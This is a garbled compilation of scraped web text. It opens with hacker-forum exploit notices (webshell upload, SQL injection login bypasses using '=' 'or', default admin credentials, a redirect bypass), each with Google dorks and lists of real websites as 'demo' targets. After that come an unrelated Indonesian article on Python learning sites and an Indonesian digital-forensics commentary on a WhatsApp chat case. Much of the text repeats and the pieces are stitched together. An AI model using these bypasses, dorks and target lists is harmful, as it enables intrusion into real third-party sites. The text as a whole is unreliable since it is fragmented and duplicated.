# Exploit Title : UpDone check Shell Upload Vulnerability
# Exploit Author :
# Dork : intext:UpDone check :/sites/default/files/up.php
# Tested on : Win 10
#################################################################################
#
# [+] Exploit : site.com/sites/default/files/up.php
#
# [+] File Location : site.com/sites/default/files/your_file.php
#
# [+] Live Demo : http://toy-info.kz/sites/default/files/up.php
#
#################################################################################
# Forum: https://forum.errorviolence.com/index.php
# Website: https://errorviolence.com/
# Discovered By: MD15
# Greets: | WithoutName | | Mr.B45KOM | | Xplo5ionS | | F0x35 | | NoNameUser | | XyouN4me | MrKeyzID |
| And all member EV |
Author : Sipahiler / TURKZ.org
Google Dork : Designed By zamikinfotech.in�
Tested on : Kali Linux
Data : 2017-06-01
Blog : http://www.trazer.org/
Forum : http://www.turkz.org/Forum/
Tutorial :
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345
OR
[+] Username: '=' 'or'
[+] Password: '=' 'or'
Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php
Google Dork : Designed By zamikinfotech.in�
Tested on : Kali Linux
Data : 2017-06-01
Blog : http://www.trazer.org/
Forum : http://www.turkz.org/Forum/
Tutorial :
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345
OR
[+] Username: '=' 'or'
[+] Password: '=' 'or'
Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php
|[+] Exploit Title: Mesaj Y�netim V.1.0 Admin Page Bypass
|[+]
|[+] Exploit Author : sohaip-hackerDZ
|[+]
|[+] Google Dork: intitle:"Mesaj Y�netim Paneli"
|[+]
|[+] Tested on: linux mint , Mozilla Firefox
|[+]
|[+] fp: https://www.facebook.com/sohaipbarika
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox
|[+]
|[+] Admin Url :-
|[+] http://127.0.0.1/bayi/giris.php
|[+]
|[+] Enter the link at NoRedirect
|[+]
|[+] go url :
|[+] http://127.0.0.1/bayi/index.php
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+] http://www.pratikgroup.net/bayi/giris.php
|[+] http://sunday80.com/bayi/giris.php
|[+] http://bilgisms.com/bayi/giris.php
|[+] http://pratikgroup.net/bayi/giris.php
|[+]
|[+] Exploit Author : sohaip-hackerDZ
|[+]
|[+] Google Dork: intitle:"Mesaj Y�netim Paneli"
|[+]
|[+] Tested on: linux mint , Mozilla Firefox
|[+]
|[+] fp: https://www.facebook.com/sohaipbarika
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox
|[+]
|[+] Admin Url :-
|[+] http://127.0.0.1/bayi/giris.php
|[+]
|[+] Enter the link at NoRedirect
|[+]
|[+] go url :
|[+] http://127.0.0.1/bayi/index.php
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+] http://www.pratikgroup.net/bayi/giris.php
|[+] http://sunday80.com/bayi/giris.php
|[+] http://bilgisms.com/bayi/giris.php
|[+] http://pratikgroup.net/bayi/giris.php
|[+] Exploit Title: tabim Admin Page Bypass
|[+]
|[+] Exploit Author : sohaip-hackerDZ
|[+]
|[+] Google Dork: intext:"Tabim Y�netim Paneli"
|[+]
|[+] Tested on: linux mint , Mozilla Firefox
|[+]
|[+]
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox
|[+]
|[+] Admin Url :-
|[+]
|[+] http://127.0.0.1/yonetim/login.php
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+]http://kahvecilerfederasyonu.org/yonetim/login.php
|[+]http://www.ankaraankarasitesi.com/yonetim/login.php
|[+]http://www.sucuprogrami.com/yonetim/login.php
|[+]
|[+] Exploit Author : sohaip-hackerDZ
|[+]
|[+] Google Dork: intext:"Tabim Y�netim Paneli"
|[+]
|[+] Tested on: linux mint , Mozilla Firefox
|[+]
|[+]
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox
|[+]
|[+] Admin Url :-
|[+]
|[+] http://127.0.0.1/yonetim/login.php
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+]http://kahvecilerfederasyonu.org/yonetim/login.php
|[+]http://www.ankaraankarasitesi.com/yonetim/login.php
|[+]http://www.sucuprogrami.com/yonetim/login.php
| # Title : SoftsMoon Est. SQL Injection / Bypass LoginPage
| # Author : Sh4dow (Bl4ckDays@gmail.com)
| # My Team : Black Termites
| # Tested on : Kali Linux
| # Vendor : http://softsmoon.com/
| # Dork : intext:"Powered by SoftsMoon Est."
========================================================================
Demo SQLi:
http://anwar.com.sa/news_details.php?nid=-32'
Demo Bypass:
http://anwar.com.sa/login.php
username:'=' 'OR'
password:'=' 'OR'
| # Author : Sh4dow (Bl4ckDays@gmail.com)
| # My Team : Black Termites
| # Tested on : Kali Linux
| # Vendor : http://softsmoon.com/
| # Dork : intext:"Powered by SoftsMoon Est."
========================================================================
Demo SQLi:
http://anwar.com.sa/news_details.php?nid=-32'
Demo Bypass:
http://anwar.com.sa/login.php
username:'=' 'OR'
password:'=' 'OR'
# Exploit Title: Steepleware Admin Login bypass
# Dork : intext:"Product of Steepleware"
# Author: Alireza Nejati
# Vendor : http://www.steepleware.com/
# Tested on: win and kali
============================================
Tutorial :
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
============================================
Admin Address : admin/welcome.php
============================================
Example :
http://www.richmcx.co.in/admin/welcome.php
Luqmanseofriendly - Python Img |
Kini Python menjadi salah satu bahasa pemrograman yang populer digunakan oleh pengembangan web, aplikasi web, aplikasi perkantoran, simulasi, dan masih banyak lagi. Hal ini disebabkan karena Python bahasa pemrograman yang dinamis dan mudah dipahami.
Selain itu, sekarang telah tersedia berbagai situs kursus yang bagus untuk mempelajari bahasa pemrograman Python ini sehingga pembaca maupun developer pemula yang akan mempelajari bahasa ini akan menjadi lebih mudah karena dapat berlatih dimanapun dan kapanpun selama terhubung dengan Internet.
Menariknya, berbagai situs kursus gratis ini menawarkan metode pembelajaran yang interaktif sehingga mudah dimengerti oleh pesertanya.
Learn Python
Bagi pembaca yang tertarik untuk belajar bahasa pemrograman Python secara gratis, situs ini menjadi salah satu pilihan yang bijak. Dalam situs Learn Python ini pembaca akan dihadapkan pada halaman utama yang berisi penjelasan, tutorial, dan kolom pembelajaran interaktif.
Disini, pembaca dapat belajar bahasa pemrograman Python mulai dari dasar hingga tingkat lanjut dengan berbagai penjelasan serta tutorial dasar untuk memahami bahasa pemrograman Python. Developer dapat langsung memasukkan kode-kode latihan pada kolom pembelajaran interaktif yang nantinya dapat dijalankan untuk melihat apakah kode tersebut bisa berjalan atau terjadi kesalahan.
Selain itu, pembaca dapat juga mengetahui keinginan dari hasil-hasil kode latihan yang diberikan oleh Learn Python pada kolom pembelajaran interaktif. Untuk yang ingin berlatih bahasa pemrograman Python di situs ini dapat langsung mengunjungi Learn Python.
Disini, pembaca dapat belajar bahasa pemrograman Python mulai dari dasar hingga tingkat lanjut dengan berbagai penjelasan serta tutorial dasar untuk memahami bahasa pemrograman Python. Developer dapat langsung memasukkan kode-kode latihan pada kolom pembelajaran interaktif yang nantinya dapat dijalankan untuk melihat apakah kode tersebut bisa berjalan atau terjadi kesalahan.
Selain itu, pembaca dapat juga mengetahui keinginan dari hasil-hasil kode latihan yang diberikan oleh Learn Python pada kolom pembelajaran interaktif. Untuk yang ingin berlatih bahasa pemrograman Python di situs ini dapat langsung mengunjungi Learn Python.
Codecademy
Bisa dibilang ini salah satu situs yang menawarkan pembelajaran dan latihan untuk beberapa bahasa situs yang populer di dunia seperti Python, JavaScript, jQuery, Ruby, PHP, Python, HTML, dan CSS dengan tingkatan level yang disesuaikan.
Developer dapat mempelajar bahasa pemrograman Python di situs ini dengan interaktif dan baik. Nantinya developer akan diberikan halaman latihan dua kolom yang terdiri dari pengenalan pada kolom kiri dan latihan pada kolom kanan.
Pada kolom kanan ini developer dapat langsung mengetikan baris kode untuk pemrograman dan dapat langsung dijalankan secara langsung. Nantinya developer dapat melihat persentase mengenai tingkatan bahasa pemrograman yang telah dipelajar. Bagi developer yang tertarik dapat langsung mengunjungi situs resmi Codecademy.
Dalam situs ini, pembaca maupun developer akan disuguhkan jalur latihan bahasa pemrograman Python mulai dari dasar hingga tingkat lanjut. Dengan menggunakan situs ini, developer dapat melakukan latihan pemrograman secara interaktif.
Nantinya developer akan meraih skor dari kemampuannya dalam menghadapi latihan yang ditawarkan Treehouse. Bagi developer yang tertarik untuk belajar bahasa pemrograman Python di situs ini maka dapat langsung mengunjungi situs resmi Treehouse.
Developer dapat mempelajar bahasa pemrograman Python di situs ini dengan interaktif dan baik. Nantinya developer akan diberikan halaman latihan dua kolom yang terdiri dari pengenalan pada kolom kiri dan latihan pada kolom kanan.
Pada kolom kanan ini developer dapat langsung mengetikan baris kode untuk pemrograman dan dapat langsung dijalankan secara langsung. Nantinya developer dapat melihat persentase mengenai tingkatan bahasa pemrograman yang telah dipelajar. Bagi developer yang tertarik dapat langsung mengunjungi situs resmi Codecademy.
Treehouse
Treehouse merupakan salah satu situs yang mengajarkan beragam bahasa pemrograman mulai dari web hingga aplikasi mobile. Beberapa materi kursus yang ditawarkan oleh situs ini di antaranya Learn Python, Android Development, Web Designer, dan masih banyak lagi.Dalam situs ini, pembaca maupun developer akan disuguhkan jalur latihan bahasa pemrograman Python mulai dari dasar hingga tingkat lanjut. Dengan menggunakan situs ini, developer dapat melakukan latihan pemrograman secara interaktif.
Nantinya developer akan meraih skor dari kemampuannya dalam menghadapi latihan yang ditawarkan Treehouse. Bagi developer yang tertarik untuk belajar bahasa pemrograman Python di situs ini maka dapat langsung mengunjungi situs resmi Treehouse.
Trinket
Situs ini menghadirkan kursus bahasa pemrograman Python yang bisa dibilang lengkap. Pembaca maupun developer akan diberikan berbagai materi dan tutorial yang interaktif. Dalam halaman materi yang disampaikan akan terdapat kolom interaktif yang akan membuat developer dapat mempelajari Python dengan lebih mudah.
Untuk materi bahasa pemrograman Python yang disampaikan akan bertahap mulai dari dasar hingga tingkat lanjut. Developer juga dapat belajar bersama visual kura-kura yang akan disajikan pada kolom interaktif setiap developer menjalankan kode-kode yang telah diselesaikan.
Kura-kura tersebut akan bergerak yang disertai dengan hasil akhir dari kode-kode yang dijalankan. Bisa dibilang metode pembelajaran yang ditawarkan oleh situs Trinket ini menyenangkan. Bagi developer yang tertarik untuk mempelajari bahasa pemrograman Python di situs ini dapat langsung mengunjungi situs resmi Trinket.
Menariknya, dalam situs ini pembaca maupun developer akan diajarkan dan dijelaskan mengenai hasil kode-kode pada kolom yang disediakan. Selanjutnya, satu per satu setiap baris dari kode tersebut akan dijelaskan secara interaktif oleh situs ini.
Apabila pembaca maupun developer masih bingung dengan penjelasan yang disampaikan maka dapat langsung berbicara dengan tutor melalui fitur chat. Bagi pembaca atau developer yang tertarik untuk belajar bahasa pemrograman Python di situs ini dapat langsung mengunjungi situs Python Tutor
Untuk materi bahasa pemrograman Python yang disampaikan akan bertahap mulai dari dasar hingga tingkat lanjut. Developer juga dapat belajar bersama visual kura-kura yang akan disajikan pada kolom interaktif setiap developer menjalankan kode-kode yang telah diselesaikan.
Kura-kura tersebut akan bergerak yang disertai dengan hasil akhir dari kode-kode yang dijalankan. Bisa dibilang metode pembelajaran yang ditawarkan oleh situs Trinket ini menyenangkan. Bagi developer yang tertarik untuk mempelajari bahasa pemrograman Python di situs ini dapat langsung mengunjungi situs resmi Trinket.
Python Tutor
Dari namanya telah terlihat jelas bahwa situs ini membuka kursus bahasa pemrogramn Python bagi pembaca maupun developer. Hampir sama dengan situs lainnya, Pythontutor ini menawarkan beragam materi tentang bahasa pemrograman Python mulai dari dasar hingga tingkat lanjut.Menariknya, dalam situs ini pembaca maupun developer akan diajarkan dan dijelaskan mengenai hasil kode-kode pada kolom yang disediakan. Selanjutnya, satu per satu setiap baris dari kode tersebut akan dijelaskan secara interaktif oleh situs ini.
Apabila pembaca maupun developer masih bingung dengan penjelasan yang disampaikan maka dapat langsung berbicara dengan tutor melalui fitur chat. Bagi pembaca atau developer yang tertarik untuk belajar bahasa pemrograman Python di situs ini dapat langsung mengunjungi situs Python Tutor
Itulah beberapa informasi mengenai situs-situs yang dapat pembaca maupun pengembang coba gunakan untuk kursus belajar bahasa pemrograman Python. Namun apabila pembaca mengetahui situs kursus bahasa pemrograman Python lainnya maka langsung memberikan komentar pada kolom komentar di bawah ini.
5 Situs yang Patut Dicoba Untuk Belajar Bahasa Pemrograman Python
Senin, 05 Juni 2017
Tag :
Pemrograman
infosec-mobileforensic-case-wa-1-715x400.png |
Diantara artikel yang muncul, ada yang ditulis oleh seseorang yang mengaku berijazah S2 Forensik dan sudah bersertifikat internasional (Artikelnya dapat dibaca di sini atau di sini . Selain di share di FB, tulisan tersebut juga sudah di share dan diposting diberbagai media website yang lebih condong membela HRS. Kemudian banyak pihak yang mengutip seolah-olah menjadi rujukan yang sahih, pada artikelnya si penulis juga tidak mengungkapkan nama aslinya meskipun mungkin dapat ditebak dari inisial dan jurusannya. Pada awal artikelnya, si penulis juga menginformasikan jika sudah pernah membantu kepolisian mengungkap kasus ITE.
Tanpa bermaksud menggurui dengan apa yang sudah disebutkan pada tulisan-tulisan tersebut, saya hanya ingin berupaya meluruskan dan juga mungkin menambahkan beberapa informasi sehingga tidak ada yang salah paham terhadap maksud isi artikel tersebut dikemudian hari. Hingga saat ini, saya juga tidak bermaksud memihak siapapun, tetapi hanya ingin meluruskan beberapa miss-informasi yang mungkin telah terjadi di lapisan masyarakat melalui pemahaman Digital Forensik dan IT Security yang saya ketahui.
Saya langsung saja membahas bagian artikel yang saya kutip berikut, pertama
Aturan tentang penggunaan bukti digital:Mungkin maksud dari point pertama dan kedua dengan unsur keterpercayaan adalah memiliki keutuhan/integritas sebagai alat bukti. Pada Mobile Forensic ada beberapa standard melakukan akusisi dan ekstraksi, bergantung pada kebutuhan kasusnya yakni akusisi logikal dan akusisi fisik. Akusisi Logikal biasanya digunakan untuk mengakses informasi informasi (konten-konten) yang masih dapat diakses pada memory/penyimpan menggunakan aplikasi standard/tersedia (Misalnya file file atau konten yang masih ada di media penyimpan/storage atau belum terhapus), sedangkan akusisi fisik biasanya dapat digunakan untuk mengakses informasi yang lebih lengkap dan detail, dengan cara melakukan dumping raw data (mengcopy isi keseluruhan media penyimpan/storage biasanya berupa Flash/eMMC/MMC card secara bit-stream copy, bit per bit). Dengan akusisi fisik, kita mendapatkan semua isi media penyimpan/storage dan partisi partisinya, dan dimungkinkan juga kita mengembalikan data/file yang sudah terhapus (data/file recovery). Bit-stream-copy juga biasanya dilakukan pada storage HDD Komputer/Laptop atau USB Flashdisk yang dijadikan alat bukti.
� Syarat agar suatu alat dapat dijadikan alat bukti digital adalah alat-alat bukti digital harus memenuhi unsur keterpercayaan, yaitu pada setiap file tidak boleh ada satupun yang �modified date� nya diatas tanggal ketika alat tersebut ditahan oleh petugas.
� Misal Hp FH ditahan pada 2 Des 2016 jam 16.00, maka jika ada satu saja file pada HP nya yang �Modified date� nya diatas tanggal 2 des 2016 pukul 16.00, maka HP tersebut tidak bisa dijadikan alat bukti karena sudah terkena �data tampering�/pemodifikasian.
Di artikel juga disebut bahwa tidak boleh ada satupun file �modified date�nya diatas tanggal ketika perangkat tersebut ditahan oleh petugas. Kalimat ini yang bisa kurang tepat jika diimplementasikan pada Mobile/Smartphone Forensic. Pada proses akusisi dan extraksi data dari perangkat mobile, banyak ahli digital forensic biasanya melakukan secara bertahap dengan memprioritaskan menggunakan Akusisi secara Logikal dan bergantung pada jenis perangkat yang akan di akusisi dan dukungan software Forensic yang dimiliki. Secara umum laboratorium forensic yang dimiliki kepolisian terutama di daerah masih sangat bergantung pada Tools dan Software Forensic, tidak jarang juga banyak perangkat yang tidak compatible dengan perangkat yang akan diperiksa. Saya sendiri sering menerima permintaan digital forensic dari rekan rekan kepolisian setelah labfor tidak mampu mengakusisi atau data ekstraksi perangkat perangkat yang menjadi alat bukti tersebut (tidak compatible) dengan tools/software yang mereka miliki, biasanya untuk perangkat perangkat yang masih berbasis Java/HP China (Non-Android). Kebetulan saya ada alatnya, yang juga mensupport hampir semua jenis HP China/Java/Non-Android.
Akusisi secara logikal pada perangkat mobile, dipastikan harus dengan tahapan menyalakan perangkat mobile tersebut, kemudian dihubungkan dengan kabel tertentu ke tools/komputer yang digunakan untuk mengakusisi data yang ada di perangkat mobile. Hal ini juga tidak serta merta dengan mudah dilakukan. Untuk banyak jenis perangkat yang statusnya ter-lock/terkunci, atau USB Debugging (ADB) tidak aktif (Android), maka perlu dilakukan tahapan tahapan untuk membypass/unlock atau mengaktifkan USB Debugging (ADB)nya terlebih dahulu. Nah, pada proses akusisi secara logikal, saat menyalakan perangkat, sudah dipastikan beberapa file yang akan ter-modified, terutama partisi boot dan Log pada aplikasi aplikasi khususnya yang autorun pada perangkat/smartphone tersebut. Meskipun semua koneksi sudah dinonaktifkan atau dimasukkan ke Faraday bag, modifikasi ini pasti dilakukan setiap OS Mobile (Android/Windows/IOS). Akusisi Logical secara Forensic tetap masih diakui sebagai salah satu standard Forensic pada perangkat Mobile. Tidak berarti jika ada file yang berubah diperangkat (seperti Log aplikasi/System Boot) akibat proses akusisi secara logikal, maka menjadi tidak memenuhi unsur integritas atau keutuhan alat bukti. Tetapi tetap dapat digunakan sebagai alat bukti yang sah, sejauh perubahan tersebut tidak mengubah atau tampering data yang berkaitan dengan kasus.
Sedangkan Akusisi secara fisikal juga terdiri dari beragam cara, dan sangat bergantung pada jenis perangkat dan software yang digunakan. Pada beberapa kasus, untuk melakukan akusisi secara fisikal misalnya berbasis Android, secara umum membutuhkan syarat USB Debugging (ADB) aktif dan Rooted. Nah pada proses memenuhi syarat ini biasanya Ahli Digital forensic juga harus menyalakan perangkat yang tetap mengakibatkan adanya perubahan pada file Log Boot System dan aplikasi yang autorun aktif. Sehingga dipastikan file file log tersebut ter-�modified� pada saat dinyalakan. Pada banyak kasus juga, jika untuk perangkat perangkat tertentu yang kita sudah kenali sistem Boot dan Chipset/Firmware yang digunakan, dengan perangkat Box Flasher/Physical Analyzer UFED/Tarantula dst dapat mengganti sistem boot dan membypass proteksi sehingga dapat mendownload isi Flash/eMMC secara raw data.
Sekilas Contoh hasil Akusisi Fisikal yang pernah saya lakukan saat menemukan alat bukti beberapa kasus:
Img Analysis |
Img Analysis |
Img Analysis |
Jika ada pertanyaan, apakah ada cara melakukan akusisi fisikal tanpa harus melakukan perubahan yang berarti pada perangkat mobile atau tanpa memodifikasi? Jawabnya ada beberapa cara, yakni akusisi fisikal dengan teknik Chip Off, JTAG Forensic dan In-System Programming (ISP)
� Chip Off : mengangkat fisik memory Chip dari perangkat, dan dibaca menggunakan chip reader lain, teknik ini dapat merusak perangkat.
� JTAG Forensic: menggunakan perangkat PCB khusus/JIG dan JTAG Box untuk menginstruksikan processor untuk mendapatkan raw data dari chip berupa full image dari perangkat, teknik ini relatif lebih aman terhadap perangkat/tidak merusak, meski tetap beresiko data rusak jika pin JTAG tidak tepat.
� In-System Programming (ISP): menggunakan perangkat identik dengan dan menggunakan semacam Konektor khusus untuk menghubungkan ke perangkat target, dan mengemulasikan softare di perangkat lain. Teknik ini biasanya mengorbankan sebuah perangkat yang identik tersebut (merusak perangkat identik)
AFAIK, ketiga cara akusisi fisikal diatas (Chip Off, JTAG forensic dan ISP) masih jarang digunakan oleh ahli digital forensik di indonesia, meskipun sudah ada yang mampu melakukannya.
Bagian kedua, yang ingin saya komentari dari artikel tersebut:
Fakta-fakta tentang dunia IT:Saya bahas masing masing point sebagai berikut:
1. Sangat mudah bagi kami orang-orang IT utk membuat chat WA palsu, semudah mahasiswa kami mengerjakan perkalian 4 digit.
2. Agak sulit untuk membuat audio palsu dengan suara identik meskipun bisa tetapi diperlukan waktu.
3. Relatif mudah bagi kami untuk mengecek apakah suatu foto asli/modifikasi.
4. Chat WA antar seseorang, adalah ranah privat tidak bsa dikenakan hukum kecuali ada aduan, sama seperti kita ngobrol, jika ada yang merekam maka baru bisa masuk pasal penyadapan, jika disebarkan masuk UU ITE (bagi yg menyebarkan).
Point pertama, benar sekali bahwa membuat chat WA Palsu cukup mudah, dan dipastikan mudah juga bagi awam untuk mengenali chat palsu yang dibuat tersebut. Tetapi akan sulit membuat chat palsu yang jalan ceritanya mirip/sesuai kenyataan atau kebenarannya bisa diperdebatkan serta berkaitan dengan foto foto real/asli dari dokumen pribadi tersebut.
Sebagai pemanasan, saya coba request bagi para pembaca yang sangat percaya bahwa chat itu palsu, silahkan buat chat palsu yang persis seperti kasus diatas, silahkan gunakan semua jenis aplikasi chat palsu yang ada di Internet/Playstore. Jika ada yang bisa membuat sama persis, mulai font chat, periode chat, jam/tanggal chat, content dst. Bisa mengirimkan capturannya ke saya, tambahkan juga informasi aplikasi yang anda gunakan. Untuk membedakan dengan chat di Video, tambahkan sebuah karakter unik juga pada setiap content chat untuk membedakan dengan yang ada di video chat yang tersebar tersebut.
Point kedua, dahulu mungkin sangat benar bahwa membuat audio palsu dengan suara yang identik itu memang sulit, tetapi jika kita mengikuti perkembangan teknologi, Adobe sudah memiliki teknologi �Voice Photosop� seperti video berikut . Dengan teknologi itu, kita hanya butuh sampling suara target, dan bisa membuat/mengenerate percakapan sesuka hati menggunakan suaranya dan identik. Meskipun diberitanya disebut bahwa photoshop akan membuatkan watermarking disetiap voice yang di generate aplikasinya, sehingga dapat dikenali bahwa voice tersebut di-generate dengan software (bukan suara asli), tetap saja dimungkinkan kedepan para pelaku kejahatan menghilangkan atau mengaburkan watermarking tersebut.
Point ketiga, untuk mengecek keaslian suatu foto saat ini relatif sulit jika hanya menggunakan teknologi saja. Karena hampir setiap aplikasi yang melakukan proses pengiriman foto seperti WA/FB/Instagram/Blog dll saat ini secara default sudah menghilangkan/merubah metadata dari sebuah file foto/gambar yang dikirimkan. Misalnya bagaimana mengidentifikasi foto yang diedit, kemudian dicapture dari screen menggunakan screen capture, lalu disebarkan. Atau foto yang screen capture atau difoto ulang (dengan kamera manual) dari layar monitor setelah di edit, kemudian disebarkan melalui media social. Relatif cukup sulit, karena selain kehilangan meta-data, beberapa algoritma yang biasa digunakan untuk deteksi keaslian foto juga akan kesulitan mendeteksi, sebut saja ELA (error level analisys), clone detection, histogram dst).
Point keempat, bahwa komunikasi antar dua orang pribadi memang ranah privat, dan dilindungi undang undang (UU ITE) sebagai salah satu hak pribadi/Privacy. Pada penjelasan Pasal 26 Ayat 1 point B disebut Hak pribadi merupakan hak untuk dapat berkomunikasi dengan Orang lain tanpa tindakan memata-matai. Tetapi meskipun demikian, jika salah seorang dari kedua pribadi tersebut melakukan aduan atas konten yang dikirimkan lawan komunikasinya, tetap dapat dikenakan pasal lainnya (spt mentransmisikan hal hal yang berbau pornografi) pada UU ITE. Jika dikaitkan dengan kasus WA tersebut, dari berita yang beredar bahwa Kepolisian dari Polda Metro Jaya sepertinya tidak menggunakan pasal pasal di UU ITE dalam menjerat kedua tersangka, tetapi menggunakan UU Pornografi, dimana disebut ada kata kunci tindakan �menyuruh� dan �melakukan� sebagai model pornografi.
Bagian ketiga dari artikel yang ingin saya komentari:
ANALISA-ANALISA:Komentar saya:
1. Pada Kasus ARL dan LM-CT digunakan UU ITE, yang menjadi tersangka dan dihukum adalah pembuat/penyebar yaitu ARL dan RD sedangkan LM-CT bebas karena secara logika ARL dan RD ada andil pada terbitnya barang tersebut sedangkan LM-CT tidak.
2. Pada Kasus FH, posisi FH mirip posisi LM/CT, yaitu sebagai korban/bukan penyebar, maka kemungkinan FH juga tidak akan dihukum meskipun sudah tersangka persis sperti LM/CT.
3. Untuk FH, CT, LM lebih pas jika menggunakan perdata/delik aduan, baru bisa diproses/dihukum setelah ada yang mengadu.
4. Pada kasus FH ini, yang mungkin bisa dihukum adalah penyebar/pembuat yaitu: pembuat website/chat.
5. Foto-foto pribadi di HP adalah private tidak ada hukumnya, sama seperti anda tidak dihukum karena tidak memakai baju ketika mandi. Karena ini masuk ranah pribadi. Baru ada hukum ketika disebarkan.
Bahwa analisa yang ditulis diatas sepertinya masih hanya difokuskan pada kasus Chat saja, padahal sebenarnya ada kaitannya dengan chat/rekaman Audio (suara komunikasi seperti monolog) yang juga dipublikasikan oleh pelaku penyebar anonim sebelumnya. Jika dicermati pada rekaman video yang berisi Audio (yang diduga suara Firza Husein) bahwa ada ungkapan/ucapan dari FH yang menyatakan bahwa �Firza Bohong, Firza tidak hapus Chat, Oh Tidak saya hapus Bib�, siapapun bisa menduga, pasti ada informasi Chat yang memang sengaja tidak dihapus oleh FH, dan akibatnya orang yang dibicarakan oleh melalui curhat audio tersebut merasa dibohongi karena FH tidak menghapus Chatnya.
Salah satu konten Video Audio yang di upload si Hacker/Anonim |
�Kak Emma� sendiri sudah mengkonfirmasi melalui keterangannya kepada kepolisian jika chat tersebut memang komunikasi dia dengan FH. Beritanya bisa dilihat di sini:
https://www.youtube.com/watch?v=f5Y8PSeAV7o
Bagian terakhir yang saya komentari adalah bagian kesimpulan dari artikel tersebut antara lain :
1. Kasus chat FH ini kemungkinan adalah gabungan antara foto pribadi yang sifatnya private (foto2 pribadi yg sulit utk ditemukan hukumnya), digabungkan dengan chat yang bisa dibilang meragukan keasliannya.Komentar saya:
Foto pribadi yang mengandung pornografi (dan mau menjadi model), jika ditransmisikan karena permintaan atau suruhan pihak lain, bisa saja dikenakan pasal UU pornografi, ada aktifitas �menyuruh� dan �kesediaan menjadi model�. Memang akan tidak masalah jika misalnya foto-foto tersebut dibuat untuk dikonsumsi/disimpan sendiri oleh si model. Dan inilah yang harusnya dibuktikan secara Digital Forensic dan dijelaskan di pengadilan. Jika foto tersebut terdapat/ditemukan pada perangkat lain (misal perangkat orang yang menyuruh) atau selain perangkat milik si model, maka dipastikan juga sudah ditransmisikan atau disebarkan. Demikian juga dengan chat asusila tersebut, meskipun bagi sebagian orang masih meragukan keasliannya, tetap harus diperiksa keasliannya dengan digital/mobile forensik pada kedua perangkat yang digunakan.
2. Melihat timeline kejadian, website muncul satu bulan setelah FH dan HP tersangka ditahan, maka jika diberitakan anonymouse lah yang membuat web/menyebarkan chat adalah impossible, karena posisi BARANG BUKTI masih dipegang petugas.Komentar saya:
Kira kira dari mana penulis artikel diatas mengetahui bahwa barang bukti yang digunakan untuk chat masih dipegang petugas? Jangan-jangan dari khabar hoax? Seperti orang Indonesia umumnya, memiliki HP lebih dari satu adalah hal yang biasa. Dari beberapa informasi seperti yang disampaikan Adik Firza pada berita ini ada 3 HP milik Firza. Ada HP Baru dan HP Lama, dan kepolisian akan (dan mungkin sudah memeriksanya). Baca disini
3. Ketika HP tersangka berada pada petugas, maka HP tidak boleh dinyalakan jaringannya karena jika dinyalakan akan merusak keaslian barang bukti/berubah �modified date� nya/tidak layak dijadikan barang bukti lagi.Komentar saya:
Jadi urutannya: HP disita dengan prosedur khusus � ditaruh di tempat khusus penghilang jaringan � dilakukan bitstream copy / memorinya dikopi / � selanjutnya yang diutak atik petugas adalah kopian sedangkan HP asli disterilkan sampai proses persidangan membutuhkannya.
Lihat komentar sebelumnya pada aturan tentang penggunaan bukti digital diatas.
4. Berdasakan pada nomer 3, maka tidak mungkin anonymouse melakukan hacking ke HP yang dalam kondisi mati/dibawa petugas.Komentar saya:
Jika bukan si penulis sendiri yang menangani secara digital forensik, sebaiknya tidak perlu menarik kesimpulan dari asumsi-asumsi (seperti asumsi klo HP yang digunakan chat masih dibawa petugas dst), bisa saja HP baru atau HP lama/Lainnya yang belum dikuasai polisi, salah satu buktinya bisa digunakan untuk berkomunikasi dengan �Kak Emma�. Yang jelas dari hasil pemahaman saya dari rekaman suara percakapan/komunikasi yang disebut mirip FH tersebut, bisa terjadi setelah peristiwa penangkapan atau penahanan desember. Si pelaku peng-upload Audio/Video Chat tersebut bisa jadi melakukan hackingnya sebelum penangkapan atau sesudah penangkapan. AFAIK, saya belum ada petunjuk yang terpublish tentang ini, kecuali mungkin pihak Kepolisian yang sudah memeriksa beberapa perangkat terkait kasus tersebut.
5. Kemungkinan HRS dalam hal ini adalah PIHAK YANG TIDAK ADA HUBUNGAN SAMA SEKALI dengan kasus FH karena chatnya kemungkinan menurut saya palsu.Komentar saya untuk No 5-9:
6. Membandingkan dengan kasus ARL, CT, LM maka pada kasus FH, FH menurut tebakan saya mungkin tidak akan dihukum, HRS mungkin menurut tebakan saya juga tidak akan dihukum.
7. Satu-satunya pihak yang kmungkinan mnurut saya akan dihukum adalah penyebar dengan pasal UU ITE pasal 27 (1) yaitu si pembuat website dan penyebar foto/chat sekaligus pasal fitnah/perbuatan tidak menyenangkan dan pelanggaran HAM menyebarkan alat bukti diluar persidangan.
8. Asli tidaknya foto FH tidak ada hubungan sama sekali dengan chat.
9. Akan sangat berbahaya bagi petugas untuk melanjutkan kasus ini, karena ujung-ujungnya bisa bumerang, masih ingat kan rentang waktu antara website/chat muncul dan penahanan tersangka? pada waktu website muncul posisi barang bukti masih ada pada petugas.�
